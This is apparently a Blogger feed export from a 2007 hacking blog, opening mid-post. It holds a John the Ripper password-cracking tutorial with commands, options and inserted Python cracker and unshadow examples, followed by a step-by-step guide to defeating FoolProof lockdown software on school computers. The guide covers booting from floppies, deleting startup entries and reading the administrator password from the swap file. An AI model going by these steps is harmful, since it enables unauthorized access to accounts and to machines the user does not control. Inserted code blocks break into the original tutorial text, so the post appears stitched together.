more than 10 characters will do fine, and even more wouldn't hurt (like 16...). By the way, the traditional DES-based crypt only looks at the first 8 characters of a password (7 bits of each, giving a 56-bit DES key), so anything past 8 is silently ignored on those older *nix systems; newer schemes such as MD5-crypt (hashes starting with $1$) and bcrypt ($2a$) use the whole password, so longer passwords actually help there :) &lt;br /&gt;&lt;br /&gt;john -w:words.lst password.file &lt;br /&gt;&lt;br /&gt;Wait wait wait! What am I doing here? &lt;br /&gt;Alright, listen up carefully. The hash that Unix stores CANNOT be reversed. Some ciphers can be undone with a simple or a complicated algorithm (in the 1st century BC, Caesar sent encrypted letters using a "shift by three" rule, so that d stands for a, e stands for b, and so on. At that time such an algorithm was fine. Today it isn't). &lt;br /&gt;The modified DES that Unix uses for its password files is not like that. Why? Because the password is used as the key, not as the data. When a user picks a password, the system builds a 56-bit DES key from it and encrypts a fixed block of zeros with that key 25 times over, with the two-character salt perturbing the cipher, and stores the result: that is the hash you see in the password file. There is nothing to "decrypt": even if you ran the hash backwards through DES with the right key you would only get the block of zeros back, and to do even that you would need the key, which is the very password you are trying to find. &lt;br /&gt;So how do John and other password crackers do it? Easy. They redo the process: take candidate words from dictionary files (wordlists), run each through the same salted crypt algorithm, and compare the result with every hash in the password file that uses that salt. If the two strings match, there you have it! The password is yours! 
&lt;br /&gt;&lt;br /&gt;If the first step doesn't work, the next step is: &lt;br /&gt;&lt;br /&gt;john -w:words.lst -rules password.file &lt;br /&gt;&lt;br /&gt;This switch does not just walk through the dictionary; it also tries modifications of each word (adding a number at the end, fool -&gt; fool1, capitalizing, reversing, and so on). This takes a long time with a huge dictionary but may give better results... Start with a small dictionary, and if that doesn't work, try it with the huge one. &lt;br /&gt;&lt;br /&gt;Sometimes people are not stupid when they choose passwords and basic rules won't do the job... aaargh. As you have seen, each step we take costs your CPU more and more time. Now you can leave your computer on and go to sleep.... &lt;br /&gt;&lt;br /&gt;If you want to squeeze even more passwords out of your password file, try &lt;br /&gt;&lt;br /&gt;john -i password.file &lt;br /&gt;&lt;br /&gt;The -i stands for incremental cracking, not a great name for it, but... &lt;br /&gt;Okay, what the hell does it do? It uses the default incremental mode parameters, which are defined in john.ini. &lt;br /&gt;What does that mean? Do you remember -rules? Yes, well, of course you do, unless you are either incredibly senile or you stopped reading after that part and only came back, like... a couple of years later. Incremental mode is something like rules, but much, much more powerful than -rules, and it takes much, much more time. &lt;br /&gt;&lt;br /&gt;4) So where are we now (dictionary vs. brute-force)? &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;You can see that in all cases so far you have been using so-called dictionary cracking... 
but hell, why not just run John in a mode where it tries all possible combinations of lowercase and uppercase letters, numbers and symbols? That would be much more efficient, right? ... WROOOOOOONGG!!! &lt;br /&gt;This method is called a 'brute-force' attack (strictly, a dictionary attack is also a kind of brute force, but most people use the term for this exhaustive search). &lt;br /&gt;What are the differences? First and most important, with a dictionary you go through selected words that could be passwords, plus their modifications; with brute force you try ALL possible combinations. That means you have &lt;br /&gt;comb=nrch^let &lt;br /&gt;&lt;br /&gt;where: &lt;br /&gt;&lt;br /&gt;comb - number of possible combinations &lt;br /&gt;nrch - number of characters in the character set &lt;br /&gt;let - length of the password in characters &lt;br /&gt;&lt;br /&gt;With John's default -i character set of 95 printable characters and, say, a 6-character password, you have 95^6 = 735091890625 possible combinations! OUCH!! &lt;br /&gt;Sure, this is useful for passwords like 2405v7, but still... with the computing power of today's PC I'd just give up, unless I had access to some university's supercomputer, which I bet nobody would ever give me (well, at least not for free, and certainly not to run a password cracker on). &lt;br /&gt;As you can see, it can take a looooong time to crack a single password; do a little math and calculate how many combinations there are for 10, 12 and 16 characters. &lt;br /&gt;I don't think you'll like the answer :) &lt;br /&gt;Of course, sometimes dictionary attacks are not enough, but John has very powerful 'thinking'. In 'incremental' mode John tries all combinations from 0 to 8 characters, but ordered by character frequency rather than blindly, so likely passwords come out first (a zero-length password is the hash of an empty string, which does turn up sometimes). So incremental mode is a kind of brute-force attack, just a smarter one... 
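&lt;br /&gt;&lt;br /&gt;The last three steps (hash each candidate with the target's salt and compare, mangle words with rules, and count the keyspace that brute force has to cover) as one small runnable cracker. This is an added example and not John the Ripper's code; because the real crypt(3) needs a platform crypt module, the hash here is a salted SHA-256 stand-in with the same two-character-salt shape, the mangling rules are a handful chosen for the example, and the wordlist and target hashes are constructed. &lt;br /&gt;&lt;br /&gt;

```python
"""A miniature dictionary cracker with mangling rules, plus the keyspace arithmetic
behind dictionary-versus-brute-force (added example; not John the Ripper's code).
The hash is a salted SHA-256 stand-in for Unix crypt(3), used so the example runs
without the platform crypt module; the loop is the one the text describes: take a
candidate, hash it with the target's salt, compare. Wordlist and targets are constructed."""
import hashlib


def stand_in_hash(salt, password):
    """One-way and salted: two-character salt followed by 12 hex digits, crypt(3)-shaped."""
    digest = hashlib.sha256((salt + password).encode()).hexdigest()
    return salt + digest[:12]


def mangle(word):
    """A few rules in the spirit of -rules: as-is, capitalized, reversed, digit suffixes."""
    yield word
    yield word.capitalize()
    yield word[::-1]
    for d in "0123456789":
        yield word + d
    yield word + "123"


def crack(targets, wordlist, use_rules=True):
    """targets: {user: hash}. Hashes are grouped by salt so every candidate is hashed
    once per distinct salt rather than once per account (the point of John's -salts).
    Returns {user: recovered_password} for the accounts that fell."""
    by_salt = {}
    for user, h in targets.items():
        by_salt.setdefault(h[:2], {})[h] = user
    found = {}
    for salt, hashes in by_salt.items():
        for word in wordlist:
            candidates = mangle(word) if use_rules else (word,)
            for cand in candidates:
                h = stand_in_hash(salt, cand)
                if h in hashes:
                    found[hashes[h]] = cand
    return found


def keyspace(charset_size, length):
    """comb = nrch ^ let from the text: candidates of exactly `length` characters."""
    return charset_size ** length


def incremental_keyspace(charcount, minlen, maxlen):
    """Candidates an [Incremental:*] section covers with CharCount, MinLen and MaxLen."""
    return sum(charcount ** n for n in range(minlen, maxlen + 1))


def hours_to_exhaust(candidates, hashes_per_second):
    """Worst-case wall clock for a plain brute force at a given crack rate."""
    return candidates / hashes_per_second / 3600.0


# Constructed demo data: three accounts on two salts; one weak password, one that
# only a rule reaches, one that no wordlist will hit.
WORDLIST = ["zalabuk", "secret", "password"]
TARGETS = {
    "owner": stand_in_hash("Ej", "zalabuk"),
    "bob": stand_in_hash("Xy", "secret7"),
    "carol": stand_in_hash("Ej", "correcthorsebatterystaple"),
}
```

&lt;br /&gt;&lt;br /&gt;Without rules only owner falls; with rules bob's "secret7" falls too; carol never does, and at a million hashes per second the 95^6 keyspace alone is over two hundred hours of brute force, which is the text's point about dictionary first, exhaustive search last. &lt;br /&gt;&lt;br /&gt;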
&lt;br /&gt;&lt;br /&gt;If you want to fire all weapons at once you just use &lt;br /&gt;&lt;br /&gt;john password.file &lt;br /&gt;&lt;br /&gt;With no mode given, John first runs "single crack" mode (guesses built from the login name and GECOS field), then the wordlist with -rules, then -i. &lt;br /&gt;&lt;br /&gt;5) What if... &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;OK, you have to turn your box off from time to time, don't you? If you are working on that haaard password that will take more than 20 hours of cracking, you can stop John with Ctrl+C and then resume with &lt;br /&gt;&lt;br /&gt;john -restore &lt;br /&gt;&lt;br /&gt;If your box crashes or there is a power failure you may not be able to restore the session (John only saves its position periodically, every 10 minutes by default, so at best you lose the last stretch)... well, that's just too bad. Hell, it happened &lt;br /&gt;to me once :-( &lt;br /&gt;&lt;br /&gt;John is modular, and that is the most powerful thing about it, what makes it the most advanced password cracker. John uses modes that are described in john.ini (remember the incremental cracking I was talking about? The rules and incremental modes are defined in john.ini). &lt;br /&gt;If you are the inventive type you can change the parameters in john.ini. &lt;br /&gt;&lt;br /&gt;Here is how the default parameters for -i look: &lt;br /&gt;&lt;br /&gt;# Incremental modes &lt;br /&gt;[Incremental:All] &lt;br /&gt;File = ~/all.chr &lt;br /&gt;MinLen = 0 &lt;br /&gt;MaxLen = 8 &lt;br /&gt;CharCount = 95 &lt;br /&gt;&lt;br /&gt;Ok... what do we have here? 
&lt;br /&gt;&lt;br /&gt;[Incremental:All] - the start of the definition for the -i:all switch &lt;br /&gt;File - name of the file holding the character set (and its character frequencies) used in mode -i:all &lt;br /&gt;MinLen - logically, the minimum password length that john -i:all will try &lt;br /&gt;MaxLen - even more logically, the maximum password length that john -i:all will try &lt;br /&gt;CharCount - number of characters from that set that John uses when you 'turn on' this switch &lt;br /&gt;&lt;br /&gt;So, are there more switches... heh? &lt;br /&gt;Yes there are, and below are all the default options, pasted from John the Ripper's documentation: &lt;br /&gt;&lt;br /&gt;John the Ripper's Command Line Options &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;You can list any number of password files on John's command line, and also specify some of the following options (all of them are case sensitive, but can be abbreviated; you can also use the GNU-style long options syntax): &lt;br /&gt;&lt;br /&gt;-single ("single crack" mode): Enables the "single crack" mode, using rules from [List.Rules:Single]. &lt;br /&gt;&lt;br /&gt;-wordfile:FILE, -stdin (wordlist mode, read words from FILE or from stdin): These are used to enable the wordlist mode. &lt;br /&gt;&lt;br /&gt;-rules (enable rules for wordlist mode): Enables wordlist rules, which are read from [List.Rules:Wordlist]. &lt;br /&gt;&lt;br /&gt;-incremental[:MODE] (incremental mode, using section MODE): Enables the incremental mode, using the specified ~/john.ini definition (section [Incremental:MODE], or [Incremental:All] by default). &lt;br /&gt;&lt;br /&gt;-external:MODE (external mode or word filter): Enables an external mode, using external functions defined in ~/john.ini's [List.External:MODE] section. 
&lt;br /&gt;&lt;br /&gt;-stdout[:LENGTH] &lt;br /&gt;no cracking, write words to stdout. When used with a cracking mode, except for "single crack", makes John print the words it generates to stdout instead of cracking. While applying &lt;br /&gt;wordlist rules, the significant password length is assumed to be LENGTH, or unlimited by default. &lt;br /&gt;&lt;br /&gt;-restore[:FILE] &lt;br /&gt;restore an interrupted session. Continues an interrupted cracking session, reading point information from the specified file (~/restore by default). &lt;br /&gt;&lt;br /&gt;-session:FILE &lt;br /&gt;set session file name to FILE. Allows you to specify another point information file's name to use for this cracking session. This is useful for running multiple instances of John in parallel, or just to be able to recover an older session later, not always continue the latest one. &lt;br /&gt;&lt;br /&gt;-status[:FILE] &lt;br /&gt;print status of a session [from FILE]. Prints status of an interrupted or running session. To get up to date status information on a detached running session, send that copy of John a SIGHUP before using this option. &lt;br /&gt;&lt;br /&gt;-makechars:FILE &lt;br /&gt;make a charset, overwriting FILE. Generates a charset file, based on character frequencies from ~/john.pot, for use with the incremental mode. The entire ~/john.pot will be used for &lt;br /&gt;the charset file unless you specify some password files. You can also use an external filter() routine with this option. &lt;br /&gt;&lt;br /&gt;-show &lt;br /&gt;show cracked passwords. Shows the cracked passwords in a convenient form. You should also specify the password files. You can use this option while another John is cracking, to see what it did so far. &lt;br /&gt;&lt;br /&gt;-test &lt;br /&gt;perform a benchmark. Benchmarks all the enabled ciphertext format crackers, and tests them for &lt;br /&gt;correct operation at the same time. &lt;br /&gt;&lt;br /&gt;-users:[-]LOGIN|UID[,..] &lt;br /&gt;load this (these) user(s) only. Allows you to filter a few accounts for cracking, etc. A dash before the list can be used to invert the check (that is, load all the users that aren't listed). 
&lt;br /&gt;&lt;br /&gt;-groups:[-]GID[,..] &lt;br /&gt;load this (these) group(s) only. Tells John to load users of the specified group(s) only. &lt;br /&gt;&lt;br /&gt;-shells:[-]SHELL[,..] &lt;br /&gt;load this (these) shell(s) only. This option is useful to load accounts with a valid shell only, or not to load accounts with a bad shell. You can omit the path before a shell name, so '-shells:csh' will match both '/bin/csh' and '/usr/bin/csh', while '-shells:/bin/csh' will only match '/bin/csh'. &lt;br /&gt;&lt;br /&gt;-salts:[-]COUNT &lt;br /&gt;set a passwords per salt limit. This feature sometimes lets you achieve better performance. For example you can first crack only the salts shared by two or more passwords (which is faster per password) using '-salts:2', and then crack the &lt;br /&gt;rest using '-salts:-2'. Total cracking time will be about the same, but you will get some passwords cracked earlier. &lt;br /&gt;&lt;br /&gt;-format:NAME &lt;br /&gt;force ciphertext format NAME. &lt;br /&gt;Allows you to override the ciphertext format detection. Currently, valid &lt;br /&gt;format names are DES, BSDI, MD5, BF, AFS, LM. You can use this option when &lt;br /&gt;cracking or with '-test'. Note that John can't crack password files with &lt;br /&gt;different ciphertext formats at the same time. &lt;br /&gt;&lt;br /&gt;-savemem:LEVEL &lt;br /&gt;enable memory saving, at LEVEL 1..3. &lt;br /&gt;You might need this option if you don't have enough memory, or don't want &lt;br /&gt;John to affect other processes too much. Level 1 tells John not to waste &lt;br /&gt;memory on login names, so you won't see them while cracking. Higher levels &lt;br /&gt;have a performance impact: you should probably avoid using them unless John &lt;br /&gt;doesn't work or gets into swap otherwise. 
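&lt;br /&gt;&lt;br /&gt;The account filters above (-users, -groups and -shells, with the leading dash meaning "everything except", and shell names matched on the basename when no path is given) and the [Incremental:All] parameters are easy to misread, so here is an added worked example in Python. It is not code from this tutorial or from John the Ripper itself: it re-implements what john's unshadow tool does (merging a passwd file with its shadow file, so that the filters have the complete passwd fields to work on), applies the three account filters with john's semantics, and computes how many candidates an incremental section covers. The passwd and shadow lines are constructed sample data with filler instead of real hashes, and the function names are my own. &lt;br /&gt;&lt;br /&gt;

```python
"""
Added example (not from the tutorial or from John the Ripper's own source):
a small re-implementation of what `unshadow` does and of how john's
-users, -groups and -shells options select accounts.  All sample data
below is constructed for the example.
"""
from collections import namedtuple

# Constructed sample /etc/passwd lines; the password field is a placeholder.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
owner:x:510:102:His name:/home/subdir/owner:/bin/bash
guest:x:511:102:Guest User:/home/guest:/usr/bin/csh
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
"""

# Constructed sample /etc/shadow lines.  The hash fields are filler that
# only looks like crypt output; daemon is a locked account ('*').
SAMPLE_SHADOW = """\
root:$1$saltsalt$aaaaaaaaaaaaaaaaaaaaaa:15000:0:99999:7:::
daemon:*:15000:0:99999:7:::
owner:Aabbccddeeffg:15000:0:99999:7:::
guest:$1$othersal$bbbbbbbbbbbbbbbbbbbbbb:15000:0:99999:7:::
ftp:$1$thirdsal$cccccccccccccccccccccc:15000:0:99999:7:::
"""

Account = namedtuple("Account", "login hash uid gid gecos home shell")


def unshadow(passwd_text, shadow_text):
    """Merge passwd and shadow the way `unshadow` does: every passwd line
    gets its placeholder password field replaced by the hash from the
    shadow entry with the same login.  Logins missing from shadow keep
    their passwd field.  Returns a list of Account records."""
    hashes = {}
    for line in shadow_text.splitlines():
        if not line or line.startswith("#"):
            continue
        login, hash_field = line.split(":")[:2]
        hashes[login] = hash_field
    accounts = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line: skip it rather than guess
        login, pw, uid, gid, gecos, home, shell = fields
        accounts.append(Account(login, hashes.get(login, pw), uid, gid, gecos, home, shell))
    return accounts


def _parse_spec(spec):
    """A spec like 'a,b' selects a and b; '-a,b' selects everything else."""
    negate = spec.startswith("-")
    items = spec[1:] if negate else spec
    return negate, set(items.split(","))


def filter_accounts(accounts, users=None, groups=None, shells=None):
    """Apply john's -users / -groups / -shells semantics.
    users: logins or numeric UIDs; groups: numeric GIDs; shells: shell
    names, compared against the full path when the spec contains '/'
    and against the basename otherwise (so 'csh' matches /usr/bin/csh)."""
    selected = accounts
    if users is not None:
        negate, wanted = _parse_spec(users)
        selected = [a for a in selected
                    if (a.login in wanted or a.uid in wanted) != negate]
    if groups is not None:
        negate, wanted = _parse_spec(groups)
        selected = [a for a in selected if (a.gid in wanted) != negate]
    if shells is not None:
        negate, wanted = _parse_spec(shells)

        def shell_matches(shell):
            for w in wanted:
                if "/" in w:
                    if shell == w:
                        return True
                elif shell.rsplit("/", 1)[-1] == w:
                    return True
            return False

        selected = [a for a in selected if shell_matches(a.shell) != negate]
    return selected


def to_john_lines(accounts):
    """Render merged accounts back into the passwd format john reads."""
    return [":".join(a) for a in accounts]


def incremental_keyspace(min_len, max_len, char_count):
    """Candidates an [Incremental:...] section covers: the sum of
    char_count**n over every length from min_len to max_len."""
    return sum(char_count ** n for n in range(min_len, max_len + 1))


if __name__ == "__main__":
    merged = unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)
    for line in to_john_lines(merged):
        print(line)
    # Keep only accounts with a real login shell, like '-shells:-nologin'.
    real = filter_accounts(merged, shells="-nologin")
    print("accounts with a login shell:", [a.login for a in real])
    print("[Incremental:All] keyspace:", incremental_keyspace(0, 8, 95))
```

Running the file prints the merged lines in the format john expects, the accounts left after the equivalent of '-shells:-nologin', and the size of the [Incremental:All] keyspace: with MinLen 0, MaxLen 8 and CharCount 95 that is 6704780954517121 candidates, about 6.7 quadrillion, which is why the tutorial runs -i:all last and after everything cheaper has been tried. &lt;br /&gt;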
&lt;br /&gt;6) Tips &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I) A good schedule for your cracking job, cheapest attacks first, is &lt;br /&gt;&lt;br /&gt;john -w:words.lst password.file &lt;br /&gt;&lt;br /&gt;john -w:words.lst -rules password.file &lt;br /&gt;&lt;br /&gt;john -i:digits password.file &lt;br /&gt;&lt;br /&gt;john -i:all password.file &lt;br /&gt;&lt;br /&gt;II) If you have a file in which every line looks like &lt;br /&gt;&lt;br /&gt;owner:*:510:102:His name:/home/subdir/owner:/bin/bash &lt;br /&gt;&lt;br /&gt;you have a shadowed password file: the password field holds only a placeholder ('*'), and the real hashes are kept in a separate shadow file that john can't get from this one. &lt;br /&gt;Go to the Byte-Me page at blacksun.box.sk and try to find out more about &lt;br /&gt;password files (I'll leave it up to you to do this. It's important that you &lt;br /&gt;learn how to find things by yourself). &lt;br /&gt;&lt;br /&gt;III) You get some little tools with john, they are all &lt;br /&gt;listed below (from john's docs) &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;unshadow PASSWORD-FILE SHADOW-FILE &lt;br /&gt;Combines the passwd and shadow files (when you already have access to &lt;br /&gt;both) for use with John. You might need this since if you only used your &lt;br /&gt;shadow file, the GECOS information wouldn't be used by the "single crack" &lt;br /&gt;mode, and also you wouldn't be able to use the '-shells' option. You'll &lt;br /&gt;usually want to redirect the output of 'unshadow' to a file. &lt;br /&gt;&lt;br /&gt;unafs DATABASE-FILE CELL-NAME &lt;br /&gt;Gets password hashes out of the binary AFS database, and produces a file &lt;br /&gt;usable by John (again, you should redirect the output yourself). &lt;br /&gt;&lt;br /&gt;unique OUTPUT-FILE &lt;br /&gt;Removes duplicates from a wordlist (read from stdin), without changing &lt;br /&gt;the order. 
You might want to use this with John's '-stdout' option, if &lt;br /&gt;you have a lot of disk space to trade for the reduced cracking time. &lt;br /&gt;&lt;br /&gt;mailer PASSWORD-FILE &lt;br /&gt;A shell script to send mail to all the users who have weak passwords. You &lt;br /&gt;should edit the message inside before using it. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So, that was about it... hope you've got something from this text. &lt;br /&gt;Further reading: try reading ALL the documentation you get with john in the docs &lt;br /&gt;directory. Maybe it's a little bit chaotic, but.... man, those are the docs :) &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ohh, wait, wait!! &lt;br /&gt;Remember, not all password files can be cracked! Smart admins switch to stronger or unusual hash &lt;br /&gt;types (john only handles the formats listed above), especially when it comes to root passwords. &lt;br /&gt;But there are always other ways to get passwords. These are covered in other &lt;br /&gt;BSRF tutorials. 
Collect them all (lol) at http://blacksun.box.sk.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-6229139594027077134?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/6229139594027077134/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=6229139594027077134' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/6229139594027077134'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/6229139594027077134'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/cracking-unix-password-files.html' title='Cracking unix password files'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-887841099624198515</id><published>2007-12-02T01:23:00.000-08:00</published><updated>2007-12-02T01:24:44.735-08:00</updated><title type='text'>Various ways to hack or over-ride</title><content type='html'>There are various ways of HACKING or Over-riding FoolProof. First off, &lt;br /&gt;let me give you a little bit of information about FoolProof. FOo0l &lt;br /&gt;Pro0F was developed my SmartStuff and is a program that is used by &lt;br /&gt;most schools in order to prvent unwanted users from changing system &lt;br /&gt;files and to stop them from doing specific acts. 
Such acts could &lt;br /&gt;include RIGHT-CLICKING, COPYING, RENAMING, USING DOS, etc... &lt;br /&gt;&lt;br /&gt;Method 1 &lt;br /&gt;&lt;br /&gt;This is a method my friend and I discovered. We were on a Windows 98 platform. &lt;br /&gt;&lt;br /&gt;1. Step one is preparation.  You need to enter the system's BIOS setup (usually by pressing DEL or F2, it will say on the boot &lt;br /&gt;screen) right away at startup.  Make sure that the computer reads from the A:\ drive &lt;br /&gt;before it goes to C:\. &lt;br /&gt;&lt;br /&gt;You will also need to acquire a Windows boot disk.  Put Edit.com on the &lt;br /&gt;boot disk as &lt;br /&gt;well.  It's available on my site. &lt;br /&gt;&lt;br /&gt;2. Boot up the computer with the boot disk in the disk drive.  Select &lt;br /&gt;start the &lt;br /&gt;computer without CD support.  Let the computer run its course, it will &lt;br /&gt;take about &lt;br /&gt;a minute.  Eventually you will get to a C: prompt.  Change to an A: &lt;br /&gt;prompt. &lt;br /&gt;&lt;br /&gt;3. Once you have the A: prompt, open up Edit.com. &lt;br /&gt;&lt;br /&gt;4. In Edit.com, go to open, then search in C:\Windows and find WIN.INI. &lt;br /&gt;Open it. &lt;br /&gt;&lt;br /&gt;5. Scroll down through the WIN.INI file and find a section that starts &lt;br /&gt;off: &lt;br /&gt;[Foolproof].  Delete that entire section.  This is the code that makes &lt;br /&gt;Foolproof open &lt;br /&gt;every time you boot Windows.  By deleting it, you are preventing &lt;br /&gt;Foolproof from opening. &lt;br /&gt;MAKE SURE TO SAVE THE WIN.INI FILE BEFORE EXITING! &lt;br /&gt;&lt;br /&gt;6. From here you are free to do whatever you want in Windows.  I &lt;br /&gt;suggest going into C: &lt;br /&gt;and locating Unfool.exe.  It is Foolproof's uninstall program. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;~^AmnesiA^~ Method 2 &lt;br /&gt;///////////////////// &lt;br /&gt;&lt;br /&gt;This is a method I discovered &lt;br /&gt;on my own a little later. 
&lt;br /&gt;I was working on a WIN98 platform once again. &lt;br /&gt;&lt;br /&gt;This time, security was damn strict on the &lt;br /&gt;machine.  The entire C:\ drive was masked and could &lt;br /&gt;not be accessed, not even in DOS!  Believe me, I tried &lt;br /&gt;everything, and nothing was working.  Security was so &lt;br /&gt;tight on this comp, it was pretty much a high tech &lt;br /&gt;paperweight. &lt;br /&gt;&lt;br /&gt;This was very frustrating, but I finally found a way around it. &lt;br /&gt;&lt;br /&gt;1. Step one is again preparation.  Make sure that the computer boots &lt;br /&gt;from A:\ first &lt;br /&gt;by going into the BIOS. &lt;br /&gt;&lt;br /&gt;Have a Win98 boot disk ready.  On this disk have Edit.com and &lt;br /&gt;CMOSKILLA, both downloadable &lt;br /&gt;from my site. &lt;br /&gt;&lt;br /&gt;2. Boot from the Win98 boot disk.  Select start computer without CD &lt;br /&gt;support.  Wait until &lt;br /&gt;you get your C:\ prompt, and again, revert to the A:\ prompt.  Run &lt;br /&gt;CMOS Killa. &lt;br /&gt;&lt;br /&gt;This will make the computer beep for a second, then it will restart &lt;br /&gt;itself. &lt;br /&gt;&lt;br /&gt;3. Again, boot up the computer from the boot disk and select no CD &lt;br /&gt;support.  This time &lt;br /&gt;at the C:\ prompt, use the DIR command and see if the drives are still &lt;br /&gt;masked.  If they &lt;br /&gt;are, then CMOS Killa didn't help, and until I think of something new, &lt;br /&gt;you're S.O.L. &lt;br /&gt;&lt;br /&gt;If you can see all of C:\, then refer to method one for further &lt;br /&gt;instructions on &lt;br /&gt;what to do with Edit.com. &lt;br /&gt;&lt;br /&gt;OR!!!!! &lt;br /&gt;&lt;br /&gt;Try some other methods yourself.  Now that you can see the drives, you &lt;br /&gt;can try running &lt;br /&gt;C:\unfool.exe.  You might want to try booting in safe mode now, &lt;br /&gt;because it should work. 
&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;NINJA Technique 1 &lt;br /&gt;///////////////////// &lt;br /&gt;&lt;br /&gt;You can do these things as long as you have access &lt;br /&gt;to C:\.  Refer to my methods numbers 1 and 2. &lt;br /&gt;&lt;br /&gt;1. Go into the Autoexec.bat with edit.com and delete FPTSR.exe &lt;br /&gt;&lt;br /&gt;2. Go into Config.sys with edit.com and delete the line device=fp &lt;br /&gt;&lt;br /&gt;3. Run REGEDIT.EXE. You have to remove FoolProof from the Registry, &lt;br /&gt;too. Use the Regedit search feature to find references to Fool Proof. &lt;br /&gt;Find the Registry backup files and make copies with different names &lt;br /&gt;just in case. Making a mistake with the Registry can cause spectacular &lt;br /&gt;messes! &lt;br /&gt;Save the registry, and reboot. FoolProof won't load. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;_________________ &lt;br /&gt;I got these last two from another page... I don't remember &lt;br /&gt;which, but I don't want to make people think I thought of shit &lt;br /&gt;when it really wasn't me. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;~ShadoW^ Method 1 &lt;br /&gt;////////////////// &lt;br /&gt;&lt;br /&gt;1) Booting up in Safe Mode bypasses FoolProof's TSR, making it possible &lt;br /&gt;for the user to delete &lt;br /&gt;    FoolProof's directory. &lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;    This can be tricky because many times FoolProof blocks the hotkeys &lt;br /&gt;which allow &lt;br /&gt;    you to boot in safe mode.  I have even tried turning off the &lt;br /&gt;computer halfway &lt;br /&gt;    through a boot and then starting up again, and still I couldn't &lt;br /&gt;drop into safe &lt;br /&gt;mode.  So try this if you want, but I haven't had much success &lt;br /&gt;with it. &lt;br /&gt;&lt;br /&gt;2) Holding the key under Macintosh prevents FoolProof's &lt;br /&gt;module from loading. 
&lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;    I have no experience with FoolProof on Macs so I have no idea if &lt;br /&gt;this works. &lt;br /&gt;&lt;br /&gt;3) Creating a copy of 'command.com' with the name of 'temp.txt' (for &lt;br /&gt;example), then opening &lt;br /&gt;    it up with wordpad, and saving it as 'c:\windows\help\wordpad.hlp' &lt;br /&gt;(make sure you don't &lt;br /&gt;    convert the file), then simply click on the HELP feature under the &lt;br /&gt;START menu, and you will &lt;br /&gt;    be dropped into DOS. &lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;    This sounds all good and dandy, but I have never seen a system &lt;br /&gt;running FoolProof that &lt;br /&gt;    actually allows the user to access the help option.  So if you &lt;br /&gt;have access to help, go &lt;br /&gt;    ahead and try. &lt;br /&gt;&lt;br /&gt;4) Use the 'echo' command to overwrite FoolProof's files (i.e. &lt;br /&gt;execute the following command: &lt;br /&gt;    'echo Hi &gt; c:\fool95\fooltsr.exe', where 'fool95' stands for the &lt;br /&gt;directory FoolProof is installed in). &lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;    I assume whoever came up with this idea wants this done in DOS or &lt;br /&gt;with a batch file.  The &lt;br /&gt;    systems I have used haven't allowed batch files to be run, and &lt;br /&gt;have made it tricky to get &lt;br /&gt;    into DOS. &lt;br /&gt;&lt;br /&gt;5) Grab the administrator password by locating it in the swap file &lt;br /&gt;created by Windows 95. You &lt;br /&gt;    can accomplish this by simply finding the string 'FOOLPROO', and &lt;br /&gt;the string after that will be &lt;br /&gt;    the administrator password. &lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;    You will need a hex editor.  Check for a link on the site. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;~ShadoW^ Method 2 &lt;br /&gt;////////////////// &lt;br /&gt;&lt;br /&gt;I modified this text to save space.  
